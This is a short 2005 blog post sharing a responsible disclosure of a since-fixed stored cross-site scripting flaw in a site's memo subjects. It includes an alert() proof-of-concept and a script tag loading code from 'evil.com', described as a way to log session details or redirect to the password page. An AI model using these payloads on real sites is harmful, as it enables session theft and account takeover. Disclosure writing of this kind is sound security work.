sadistical's profile . sadistical's homepage
Posted by sadistical
on Tue 1 Feb 05, 7:56 PM to sadistical's blog.
Seems like I can't stop doing security work even in my "time off". Here's a (fixed) security issue I reported to the site admins yesterday.
Kudos on them for fixing it so promptly and running such a good site...
----
Whilst experimenting with sending messages to people and myself I couldn't help noticing a security problem in your current memo implimentation.
Rather than abuse it I'm reporting it so that you can fix it.
Simply put you filter javscript from the body of memos, but not from the subjects - this means that I can send a malicious memo to a user, and when they view their memo page javascript can automatically execute.
To test this for yourself simply send a memo to a user (such as yourself):
Subject: <script>alert(1);</script> Body: <script>alert(2);</script>
You will see that when the memos page is loaded the script is automatically executed from the subject.
I suspect that the lenght is boundschecked - but I imagine a suitably evil piece of code could be included with:
<script src="http:/evil.com/blah.js">
This could redirect to the chage password page, or log the session details.
